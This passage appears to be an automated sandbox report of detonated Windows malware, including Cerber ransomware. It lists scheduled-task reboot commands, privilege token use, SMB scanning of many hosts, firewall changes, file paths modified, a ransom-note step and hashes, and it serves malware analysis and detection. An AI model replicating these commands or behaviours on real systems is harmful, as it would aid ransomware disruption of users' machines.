Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\B6EC.tmp N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:36

C:\Users\Admin\AppData\Local\Temp\B6EC.tmp

"C:\Users\Admin\AppData\Local\Temp\B6EC.tmp" \\.\pipe\{34CD1734-388D-43CE-B4BC-AFBD4CA6E864}

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:36

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 75.209.201.84.in-addr.arpa udp
N/A 10.127.0.0:445 tcp
DE 136.243.76.173:445 tcp
US 84.201.209.75:445 ctldl.windowsupdate.com tcp
N/A 10.127.0.1:445 tcp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
DE 136.243.76.173:139 tcp
N/A 10.127.0.1:139 tcp
US 84.201.209.75:139 ctldl.windowsupdate.com tcp
N/A 10.127.0.0:139 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.2:139 tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.3:139 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.4:139 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.6:139 tcp
N/A 10.127.0.7:445 tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
N/A 10.127.0.7:139 tcp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
N/A 10.127.0.8:445 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.11:139 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.12:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.13:139 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.14:139 tcp
N/A 10.127.0.15:445 tcp
US 8.8.8.8:53 66.208.201.84.in-addr.arpa udp
N/A 10.127.0.15:139 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.16:139 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.17:139 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.18:139 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.21:139 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.22:139 tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
N/A 10.127.0.23:445 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
N/A 10.127.0.23:139 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.24:139 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.25:139 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.26:139 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.27:139 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.28:139 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.29:139 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.30:139 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.31:139 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.32:139 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.33:139 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.34:139 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.35:139 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.36:139 tcp
N/A 10.127.0.37:445 tcp

Files

memory/3420-0-0x0000000000E50000-0x0000000000EAE000-memory.dmp

memory/3420-8-0x0000000000E50000-0x0000000000EAE000-memory.dmp

memory/3420-9-0x0000000000E50000-0x0000000000EAE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B6EC.tmp

MD5 7e37ab34ecdcc3e77e24522ddfd4852d
SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
SHA256 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
SHA512 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587

memory/3420-11-0x0000000000E50000-0x0000000000EAE000-memory.dmp

memory/3420-22-0x0000000000E50000-0x0000000000EAE000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win10v2004-20241007-en

Max time kernel

95s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cerber.exe"

Signatures

Cerber

ransomware cerber

Cerber family

cerber

Contacts a large (1100) amount of remote hosts

discovery

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\word\startup\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\documents C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\desktop C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpBB03.bmp" C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification \??\c:\program files\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\documents C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\desktop C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\desktop C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\documents C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NOTEPAD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 428 wrote to memory of 60 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 428 wrote to memory of 60 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 428 wrote to memory of 60 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 428 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 428 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 428 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 428 wrote to memory of 3276 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 428 wrote to memory of 3276 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 428 wrote to memory of 3276 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 428 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 428 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 428 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 428 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 428 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 428 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 2152 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2152 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2152 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2152 wrote to memory of 3852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
